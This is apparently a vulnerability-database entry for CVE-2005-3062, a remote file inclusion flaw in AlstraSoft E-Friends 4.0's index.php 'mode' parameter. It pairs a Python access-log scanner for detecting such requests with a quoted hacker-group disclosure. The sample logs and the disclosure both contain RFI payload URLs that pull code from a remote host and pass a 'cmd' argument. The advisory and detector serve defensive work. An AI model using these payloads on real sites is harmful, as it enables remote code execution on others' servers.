AlstraSoft E-Friends index.php Remote File Inclusion Vulnerability

Vulnerability ID 1197773 Vulnerability type Input validation
Published 2005-09-27 Updated 2005-10-20
CVE ID CVE-2005-3062
CNNVD-ID CNNVD-200509-257
Platform N/A CVSS score 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2005090019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-257
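|Vulnerability details
AlstraSoft E-Friends is a commercial friend-making (social networking) system. The index.php script in AlstraSoft E-Friends 4.0 contains a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code via the mode parameter.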
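
A log check for the request pattern described above, as an added example that is not part of the original advisory or the vendor's code: it flags index.php requests whose mode parameter decodes to a URL scheme or wrapper, a protocol-relative URL, or a UNC path. The log lines, hosts and the benign value `people_card` are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request target inside a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# mode values that start with a scheme/wrapper ("http:", "php:"), "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalized."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_mode(target):
    """Return the decoded mode value if the request target is index.php with a
    remote-looking mode parameter, else None."""
    parts = urlsplit(target)
    if parts.path.lower().rsplit("/", 1)[-1] != "index.php":
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == "mode":
            value = fully_unquote(value)
            if REMOTE_RE.match(value):
                return value
    return None

def scan(lines):
    """Yield (line_number, mode_value) for each flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hit = suspicious_mode(match.group(1)) if match else None
        if hit is not None:
            yield number, hit

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2005:10:00:01 +0000] "GET /index.php?mode=people_card HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Sep/2005:10:00:07 +0000] "GET /index.php?mode=http://remote.example/x?&cmd=id HTTP/1.1" 200 812',
    '192.0.2.44 - - [27/Sep/2005:10:00:09 +0000] "GET /index.php?mode=hTTp%253A%252F%252Fremote.example%252Fx HTTP/1.0" 200 812',
    '192.0.2.77 - - [27/Sep/2005:10:01:30 +0000] "GET /search.php?mode=http://remote.example/x HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote mode value {value!r}")
```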
|Exploit
AlstraSoft E-Friends Remote command execution

Site : http://www.alstrasoft.com/efriends.htm

Description :

AlstraSoft E-Friends is an online social networking software that allows you to start your own site just like Friendster and Tribe.net. The E-Friends software allows members to connect to people in their personal networks and community, creating a new online interactive resource that is based on a trusted network of friends and associates on the internet.

Members can use this abundant network to make friends, find their loved ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish much more with the help of groups and individuals who they know and share the same interests.

With our new 4.0 release, you can now start a profitable social networking business by creating custom membership packages using Paypal payment gateway. In addition, we have added several new exciting features including online blog, forums, text-based chat, events and many more! Enhancements are also added to the admin backend and with our integrated banner ads system, you can earn extra income by publishing paid banner ads on your E-Friends site.

Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd=

Solution : no :P

Contact : khc (at) bsdmail (dot) org

Kurdish Hackers Clan!
|References

Source: BID
Name: 14932
Link: http://www.securityfocus.com/bid/14932
Source: SECUNIA
Name: 16941
Link: http://secunia.com/advisories/16941/
Source: SREASON
Name: 22
Link: http://securityreason.com/securityalert/22
Source: BUGTRAQ
Name: 20050924AlstraSoftE-FriendsRemoteCommandExucetion
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112758134227112&w=2
